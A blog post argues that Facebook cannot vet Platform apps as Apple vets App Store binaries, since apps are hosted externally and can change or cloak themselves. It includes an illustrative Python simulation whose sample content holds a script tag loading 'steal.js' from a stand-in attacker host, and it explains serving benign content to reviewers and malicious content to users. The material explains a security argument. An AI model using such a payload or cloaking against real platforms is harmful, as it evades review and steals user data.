Facebook Platform as walled garden – How Sophos got it wrong

Graham Cluley from Sophos, a leading internet security company, recently published a piece entitled Facebook users call for application “walled garden” to protect against attacks. In it, he asks the simple question: “Should Facebook follow Apple’s example, and have a ‘walled garden’, verifying all apps?” 1025 of his blog readers responded to the poll, 95% of them with YES!

The results of the poll should come as no surprise. Security and privacy are always hot topics for Facebook, and saying you’re against better security is like being against motherhood and apple pie. It’s true that there are malicious Facebook apps, but is a walled garden the right approach? I say no.

Let’s look at the facts. Apple has a great opportunity to wall off its garden with the App Store. If you’re a developer and want to distribute your app, you need to go through Apple. They take the binary and verify (to some extent) that it isn’t malicious, and also that it fits the Apple world view (i.e. no “bad stuff”, and nothing that treads too close to something Apple wants for itself). Once approved, that same binary sits on Apple’s servers waiting for people to download it to their iPhones. The thing Apple reviewed is the thing users run.

That ain’t how Facebook works. Facebook apps are simply web applications that are proxied by Facebook. (I’ll only discuss Canvas apps here; Connect apps REALLY can’t be policed.) There’s no “server repository” for Facebook apps: they’re hosted by their developers on their own server equipment, Amazon AWS, Joyent, Rackspace, or any of the thousands of other places that host web apps. It’s like this because that’s how the Platform is defined, and how it needs to be defined. If you don’t like that and want it changed, then you don’t understand how the Facebook Platform architecture works.

And that’s where the problems start if Facebook tried to put a walled garden around third-party Platform apps. Facebook cannot vet them the way Apple vets iPhone apps, because tomorrow the app can, and probably will, change. Since it’s hosted externally, Facebook cannot control that change, or even know about it: a review only proves what the developer’s server chose to return at the moment of review. Even if Facebook threw lots of money at the problem and hired loads of people to vet every app on the Platform, it would be really easy for malicious people to get around it, by pushing new code after approval or by serving one thing to the reviewer and another to everyone else.
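To make the gap in the two paragraphs above concrete, here is a toy model of vetting an externally hosted app. It is an added example written for this page, not review tooling from Facebook, Apple or Sophos. It assumes (a) the platform’s review and re-check requests are recognisable as the platform’s (by IP range, User-Agent or account) and (b) a real user’s request reaches the developer’s server in a way the server can tell apart from the platform’s, as with a canvas page loaded in an iframe. The app servers are simulated by Python classes; the URLs, app names and content are made up.

```python
"""Toy model of one-shot vetting versus an externally hosted, mutable app.

Illustrative code written for this page, not any platform's real review
tooling. Third-party app servers are simulated by Python classes; the URLs,
app names, content and the 'requester' labels are constructed for the example.
"""
import hashlib
from dataclasses import dataclass


@dataclass
class Approval:
    app_url: str
    sha256: str  # digest of exactly what the reviewer saw, nothing more


def digest(body: bytes) -> str:
    return hashlib.sha256(body).hexdigest()


def review(app_url: str, fetch) -> Approval:
    """One-shot vetting (the App Store model): fetch the app, inspect it, pin a hash."""
    body = fetch(app_url, requester="platform")
    # A real review would analyse `body` here; for this model, approval == hash.
    return Approval(app_url, digest(body))


def platform_recheck(approval: Approval, fetch) -> bool:
    """What a platform could add on top of review: re-fetch and compare to the pinned hash.

    Assumption: the request is still identifiable as the platform's, so a
    server can tell it apart from ordinary users' requests.
    """
    body = fetch(approval.app_url, requester="platform")
    return digest(body) == approval.sha256


def user_load(approval: Approval, fetch) -> bytes:
    """An ordinary user's browser loads the app straight from the developer's host."""
    return fetch(approval.app_url, requester="user")


# Constructed sample content; the script host is a placeholder, not a real domain.
BENIGN = b"<html><body>Quiz: which fruit are you?</body></html>"
MALICIOUS = b"<html><body><script src='//attacker.invalid/steal.js'></script></body></html>"


class MutableApp:
    """The 'tomorrow the app will change' case: code swapped on the developer's own server."""

    def __init__(self):
        self.body = BENIGN

    def fetch(self, url, requester):
        return self.body


class CloakingApp:
    """Serves benign content whenever the platform looks, malicious content to everyone else."""

    def fetch(self, url, requester):
        return BENIGN if requester == "platform" else MALICIOUS


def scenario_mutated():
    """Approval pins the benign version; the developer then pushes malicious code."""
    app = MutableApp()
    approval = review("https://quiz.example/canvas", app.fetch)
    app.body = MALICIOUS  # the platform is neither consulted nor notified
    return {
        "recheck_passes": platform_recheck(approval, app.fetch),  # False: drift is visible,
        "user_gets_malicious": user_load(approval, app.fetch) == MALICIOUS,  # but only if someone re-checks
    }


def scenario_cloaked():
    """Even continuous re-checking fails once the app can recognise the checker."""
    app = CloakingApp()
    approval = review("https://quiz.example/canvas", app.fetch)
    return {
        "recheck_passes": platform_recheck(approval, app.fetch),  # True: the platform sees benign
        "user_gets_malicious": user_load(approval, app.fetch) == MALICIOUS,  # True: users get the payload
    }


if __name__ == "__main__":
    print("mutated after approval:", scenario_mutated())
    print("cloaked:", scenario_cloaked())
```

The hash pin is deliberately generous to the walled-garden side: real canvas apps render per-user, dynamic HTML, so a platform could not even pin a hash in practice. Even with that unrealistic advantage, the first scenario shows that a one-time review says nothing about what is served tomorrow, and the second shows that re-checking from an identifiable platform vantage point is defeated by a server that simply answers the checker differently from users. Vetting a binary you host yourself has neither problem, which is the difference the post is drawing.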

So sorry Sophos, better security is what everyone wants, but Facebook cannot “walled garden” its Platform the way Apple does, because the two platforms distribute code in fundamentally different ways: Apple hosts and serves the very binary it reviewed, while Facebook only ever sees whatever a developer’s server chooses to return. Comparing Apple to Facebook is like comparing apples to … well, you get the idea.
